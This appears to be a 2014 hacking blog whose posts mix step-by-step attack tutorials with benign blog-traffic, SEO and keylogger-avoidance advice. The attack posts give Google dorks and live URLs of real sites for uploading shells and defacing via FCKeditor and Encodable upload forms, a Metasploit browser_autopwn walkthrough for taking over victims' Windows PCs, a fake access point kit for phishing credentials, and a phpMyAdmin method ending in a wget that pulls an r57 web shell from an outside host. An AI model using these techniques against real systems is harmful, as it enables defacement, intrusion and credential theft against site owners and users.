Selasa, 15 April 2014

Portail Dokeos deface and Shell Upload vulnerability

Portail Dokeos Vulnerability is a Kind of FCK Editor Remote file upload Vulnerability..
In this Vulnerability Hacker can upload a shell. deface page or any file on website without admin username and password...
NOTE: THIS IS ONLY FOR EDUCATION PURPOSES, AND FOR SAFETY PURPOSE. WE ARE NOT RESPONSIBLE ANY HARM DONE BY YOU.

Follow the Instructions:-

1). Go to Google and enter the following dork
Google Dork :"Portail Dokeos 1.8.5"
2). Open any site and change the url after site.com to the Exploitable target..For Example:-

Exploit: http://website/patch/main/inc/lib/fckeditor/editor/filemanager/upload/test.html

3). Now change ASP into PHP like FCK editor and Upload you deface shell or file, You can upload, .html .php .jpg .txt formats here..



To view your uploaded file go here : http://website/patch/main/upload/your file here 

Live Demo:-
http://www.kifofy.fr/kcours/main//inc/lib/fckeditor/editor/filemanager/upload/test.html
http://ecampus.webinfo-concept.fr/main//inc/lib/fckeditor/editor/filemanager/upload/test.html

Read more

Encodable Shell File upload Vulnerablity

Yeah read it :) :P

NOTE: THIS IS ONLY FOR EDUCATION PURPOSES, AND FOR SAFETY PURPOSE. WE ARE NOT RESPONSIBLE ANY HARM DONE BY YOU.

Lets Start:-

1). Open google.com and Enter the following dork
Dork: "intext:File Upload by Encodable"
Result comes with 166,000 results.. but some results are fake ... its may be malwares
So pick real things only , "Upload a file" You will this title in search results here :)
Click the sites only which comes with upload a file title..


2). After click the link you'll got a upload form...


3). You'll see some options in this form like name Description email etc ...
type anything in these boxes but add a email in email box, dont use your own
put this one billy@microsoft.com , admin@nasa.gov etc :P

4). Now choose you file and upload it :)

5). After clicking on upload button a pop up will be open ... dont close it, it will automatically closed
after uploading file.

6). In some sites you'll get your uploaded file link after uploading on website
and if you did not file it then try these url
/upload/files/
or /upload/userfiles/

Live Demo : http://www.bellblue.com/cgi-bin/filechucker.cgi

Read more

How to avoid becoming a victim of keyloggers


Know how it works:
Knowing how it works will help you make a better decision. A keylogger is a little piece of software that normally stays hidden in your system and collects information on the keys you press on your keyboard. This coupled with its ability to match these keystrokes with the application for which they are being pressed, make a keylogger an extremely dangerous hacking tool. As normally it resides in a system hidden, it can steal your information without you even noticing anything.

Use good quality anti-keylogger software:
Anti-virus anti-malware software are a requirement for every user. But they may not be able to detect and remove keylogger software. For this, you should use specific anti-keylogger software. In fact, according to a report almost all anti-virus software failed to detect a keylogger in a controlled lab test. Only a specifically tailored anti-keylogger can make sure that your information stays safe and secure.

Use secure communication channels:
As important and useful the worldwide web is, it is as much dangerous because of some people who use it for their nefarious designs. Some steal your information while others just like to bog down a system with excessive virus attacks. Make sure that you are using only secure websites for your communication, like emails, instant messaging and video calls etc. It is these unprotected sites that can spread these keylogger software easily. Avoid them at all costs for your communication needs.

Be on alert:
The best possible way to protect your computer and your information is to be on alert. It is almost always when you do not take care and follow security precautions that you fall victim to these tricks and get your system infected with viruses. Putting your information at risk is not a good idea. But thinking that anti-virus software, or anti-keylogger software for that matter, will keep your system 100% secure is a mistake. If you are not on your guard, anyone can access your system physically and compromise your security wall, thus eliminating the need of tackling anti-virus over the internet. You also need to know which sites you are visiting and whether there is any Google or other security software advisory on that site. You should also avoid clicking on suspicious links, particularly those appearing in your email, asking for your private information.

Stay updated:
You should also make sure that your system is updated with the latest system and anti-virus software security patches. This will ensure that your system is protected and can withstand attacks over the internet. In any case, you are the one who needs to be on guard more than your system.
Read more

Senin, 14 April 2014

How to Increase Traffic and Page Views in Blogger?

Decent amount of traffic to a blog is the dream of every blogger. All hard working and work addicted bloggers do a lot of things to gain massive amount of traffic to their blog because without it, we are not able to success in our blogging career. Here at Hackers Store, I have shared a lot of tips and tricks to increase blog traffic and page views. Today, I’ll provide the compilation of all those methods and ideas so that you can learn about the strategies that work awesomely to maximize the traffic to a blog.

I have divided this post into two sections of Tips and Tricks that really works to increase traffic to blog. Doing so will help you to understand what tips and tricks we can apply to our blog to increase its popularity. Let first start with the tips which are necessary for every blog in any niche.

Tips to Increase Blog Traffic:-

When you first create a blog on blogger, then definitely you search on Google that how to increase traffic to blogger. And this is the most common question asked by newbie bloggers. That's why I published a post so that they can also know the ways that can help them to improve traffic to their blog. I have short listed all those working tips in below post. 

1). Fast Loading Template:-
You must need to make your blog looks professional. Always try to make your blog's look nifty. Visitors first look at the blog design and if they don't like the design then they will never come back. Try to get a fast loading template for your blog. Visitors love to read fast loading blogs.

2). Use Share Buttons:-
Social share buttons really works to get new visitors to your blog. If your readers like your post content then surely they will share it with their friends. This will invite new readers to your blog to read the story. Beside this share buttons also help to increase your blog backlinks and search engines loves these backlinks. It will help your posts to rank in search engines and your traffic will increase.

3). Keyword Research:-
Keyword research is an interesting and enjoyable task. Before publishing any article always do some research on your keywords you are going to use into your post. Choose best keywords for your posts to target the audience. Always use Long Term Keywords (Long Tail Keywords) because they are easy to rank as compare to short term keywords. Google also show accurate result while somebody search for any information if the user query contains more than 5 words. 

4). Blog Commenting:-
This is what I like most to increase blog traffic. Make it your habit to post comments on other popular blogs of same niche regularly. It is the best way to increase your blog readers. If possible then try to leave the first comment with link back to your sites. Because readers also read comments and first comment attract the readers and if your comment is interesting for readers then they will surely click on your link to know about your blog. It will increase your blog readership and hence more traffic to your blog.
Note: Don't put spam comments. First read the post and then leave a valuable comment that add some value to the conversation. Don't comment like 'nice post', 'helpful article' etc. These types of comments not attract the readers.

5). Reply to Comments:-
Reply to your reader's comments. Solve their queries and doubt about the topic you are posting. It will help you to build better relationships with your blog visitors. They will like to visit your blog again and again to get something new. Returning visitors are really important for success of a blog.

Tips to Increase Blog Page Views:-

As same as blog traffic, increasing blog page views is also important. If you are not able to make your blog sticky for your readers then they will leave your blog without reading more posts. For a successful blog, page views are most important to increase. If you are thinking that how we can increase page views of our blog, then there is no need to worry. When you read below post then you will be amazed how easy that is. Don't miss to read it.

1). Show Related Posts:-
Whenever you write new post for your blog, always remember to tag it with a keyword rich label before publishing it. Then use related posts widget to show similar posts under that label below every post. It will not only increase your blog page views but also reduce your blog bounce rate.

2). Highlight Popular Posts:-
Put popular posts widget into blog sidebar to show most trendy posts of your blog. By doing so, you provide one more option to the visitors to click the link. Once they attract towards the popular posts they will surely keen to read them. Hence more blog page views that automatically increase your blog traffic.

3). Deep Linking:-
You may already know the benefits of internal linking and deep linking is same as internal linking but it has some more benefits then it. Suppose you have two posts in your blog Post A and Post B then you can interlink Post A with Post B. But in case of deep linking you need to link Post A with that post which is same with that topic means which covers topic of Post A in depth.

4). Split Lengthy Posts:-
Generating quality content for blog is must for success. You should make a plan to publish at least a post with details and well explanation in a week. For ex: 20 Tips to Increase Blog Traffic. Once you write a lengthy and detailed post, the tricky part comes in action. 

5). Use Search Box:-
If your readers finish reading the article and want more relevant information and don’t get it then surely they will go back to another blog for more information. To resolve this issue always add a search box in your blog like Google Custom Search Box. This is the best widget that shows more relevant posts than other search boxes.

Source : Internet
Read more

Top 10 latest SEO techniques for Webmasters



The success or failure of any site greatly depends upon the ranking of search engine that shows the results of your website. If your rank is very below like at 3 or 4 page, the visitors don’t have enough time to wait and watch every site on the web. They simply click among the sites that are posted on first page. Now, in order to increase your visitors your site must be among top sites for which you have to follow some SEO tips which are mentioned below. However getting a website on the top of the ranking takes a little time, but it's not something out of the box. Quality content is the key to reach at the top of the rankings using the latest search engine optimization techniques.


1). Create a Meta tag data for your Site..
A page title is the very first thing which a search engine looks at because it describes the mission statement of your website that what your website is about. It is also the first thing potential visitors will see when looking at your search engine listing.

It’s important to include one or two attractive and attention seeking keywords in the title tag — but don’t go overboard. You can also include your websites name and location in your title page.

2). Unique titles increase the probability of visitors ..  
Since titles are like the headings which are the first and most visible thing a visitor might see on your website. Therefore, before reading the inner crispy and crunchy content if the reader fails to appreciate your title then rich content is of no use. Therefore choose unique and engaging titles in order to maintain the attention of readers till the last word of your site. 

3). Make attractive keywords..
Before creating your keyword list, you’ll want to think of the specific terms people will type in when searching for a site like yours. Always include simple and relevant keywords related to the topic of your website. For example if your website is about textile do include the word threads and clothes but be stick to a brief list of keywords don’t include too many synonyms because it may increase the readers but they'll be short run reader you won't be able to catch them for a longer time.

4). Heading tags catches attention of readers easily..
Since, headings are the first thing which gains attention of the reader. Therefore make attractive, engaging and easy to relate headings. This is a very important element to consider when writing out your site copy. Use of heading tags helps users, web browsers and search engines alike know where the major key points of your copy are.

5). Use of ALT and TITLE tags to the images are a plus point...
The use of alt on images is useful from two points of views; first In SEO, putting a brief yet attention gaining alt attribute along with your image gives additional relevant text to your source code that the search engines can see when ranking your site. Secondly, the more relevant text on your page the better chance you have of achieving higher search engine rankings.

6). Promote your site through social media...
Since, Facebook and twitter have made virtual communities over internet and people spend most of the time surfing on these sites. Creating a page on Facebook is one of the leading trends emerging to market your brand. Also by giving the link of your site on Facebook can actually increase your viewers by a high percentage. And Facebook, Twitter, Google+, Pinterest & LinkedIn are those places from where you can get tons of free traffic. And they are crawled by search engines as well like Google.

7). Write clean content...
Always write clean, clear and legal content. Don’t use abusive language and don’t plagiarize the content. If you are copying content from any website, Always acknowledge it. This will for sure places your website among top priorities.

8). Give Brief description of each heading...
Before creating your own web site, remember it always write simply, explaining whatever information you’re discussing is relevant to your main topic and Meta title. The key is to make it sense to the reader. Even if you trick the search engines by increasing your rating and making your site listed on the first page. Remember you can't trick the reader who after clicking your site and taking no inputs from it rather than irrelevant content can switch to other site in a matter of seconds. 

9). Create Natural link profile...
With the use of natural and genuine content, you’ll be able to generate links with other web sites and blogs, as well. It’s kind of give and take scenario, that if you link out to other sites, you’ll find sites linking back to you  and this is how your page rank can go up as well.

10). Localize your content...

Always give proper name, address and relevant map of your website so that the reader can trace if you are making a brand or product related website

We hope you'll find the above tips useful when optimizing your websites/blogs. And also give us some feedback about your Search Engine Strategies in comment section.
Read more

Hack Remote Windows 7 | XP PC With Metasploit (Browser Auto Pwn Vulnerability)

Hi all this is one of the popular attack know as browser auto pwn Vulnerability which we are going to use in this tutorial.

This is a simple vulnerability that allow attacker to hack to remote machine just by a single click by the victim.
NOTE: THIS IS ONLY FOR EDUCATION PURPOSES, AND FOR SAFETY PURPOSE. WE ARE NOT RESPONSIBLE ANY HARM DONE BY YOU.

-::Using Metasploit::-

In Metasploit there is a module known as browser autopwn. The basic idea behind that module is that it creates a web server in our local machine which will contain different kind of browser exploits. When the user will open the malicious link then the execution of the exploits will start against the browser of the user and if one of the exploits is successful a meterpreter session will open.

Follow these steps to carry out the attack :-

1). Open you backtrack/kali terminal make sure metasploit is there (which is present by default :D ).

2). Type #msfconsole on terminal



3). Now follow these steps as show in image

4). Use the browser_autopwn module

use browser auto pwn


5).We have set up the LHOST with our IP address,the port to be 4445 and the URIPATH with / in order to prevent metasploit to set up random URL’s.now you will see below image.

server started with 16 module
Server started with 16 module.

6). Next we need to send the link to victim (like here http://192.168.205.131:8080/).as soon as the victim open the link its all done.

We have the meterpreter shell control in out hand you can do various activity you wish with meterpreter shell functionality.


Enjoy the hack of your victim machine have fun .!!!!

Read more

PwnSTAR: Pwn Soft Ap Script For Hacking

It is basically a bash script to launch a Fake AP, configurable with a wide variety of attack options. Includes a number of index.html and server php scripts, for sniffing and phishing.Can act as multi-client captive portal using php and iptables.

Launches classic exploits such as evil-PDF.An easy way to launch the "best" metasploit modules eg CVE-2013-0422 De-auth with aireplay, airdrop-ng or MDK3.

Few Top features:-
1). Takes care of configuration of interfaces, macspoofing, airbase-ng and isc-dhcp-server
2). Steals WPA handshakes
3). Phishes email credentials
4). Serves webpages: supplied (eg hotspot, below) or provide your own
5). Sniffing with ferret and sslstrip
6). Adds a captive portal to the frontend of the fake AP
7). Assorted exploits
8). De-auth with MDK3, aireplay-ng or airdrop-ng
9). Use your imagination, craft your own webpages, and have fun.

Download Package contents:
-"Hotspot_3" is a simple phishing web page, used with basic menu option 4.
-"Portal_simple" is a captive portal which allows you to edit the index.html with the name of the portal
                    Example:- "Joe's CyberCafe". It is used for Sniffing.
-"Portal_hotspot3" phishes credentials, and then allows clients through the portal to the internet.
-"Portal_pdf" forces the client to download a malicious pdf in order to pass through the portal.
-Designed for Kali-linux and BackTrack5 ,Current version for Kali is PwnSTAR_0.9.

PwnSTAR.tgz is a bundle containing the current version of the script + all required webpages.

Download:-
Installation process:-

1). It is simple to install and use. download from above link and then follow the screenshot.


2). And Main menu is this-->


Keep checking Hackers-Store for upcoming tutorial on PwnSTAR.
Read more

Minggu, 13 April 2014

Upload Shell And Deface Via PhpmyAdmin

Earlier I have posted About How to get Acess to PhpmyAdmin without login through google dorks. As i promised I will post about how to deface using PhpmyAdmin. So here it is Lets start...
NOTE: THIS IS ONLY FOR EDUCATION PURPOSES, AND FOR SAFETY PURPOSE. WE ARE NOT RESPONSIBLE ANY HARM DONE BY YOU.

Requirements(All You Need):-
-You must have the full path 
- pma & mysql db privileges. 

Follow the Instructions:-
1). First login in to mysql. Or you can use these dorks also CLICK HERE.



2). Now click 'Show MySQL system varible" then 'SQL' . Now you can run sql commands,like create db, delete tables or whatever. We want to upload shell so lets move on to it. 



3). Now we will create a cmd line into a new file,with select into. SELECT "" INTO OUTFILE "full/path/here/cmd.php" and click 'Go'. 

4). Now, the cmd line is here http://site.com/cmd.php lets run the command to get shell. wget http://www.r57.biz /r57.txt;mv r57.txt shell.php. Thats all then we av the shell on the site!!..!


Read more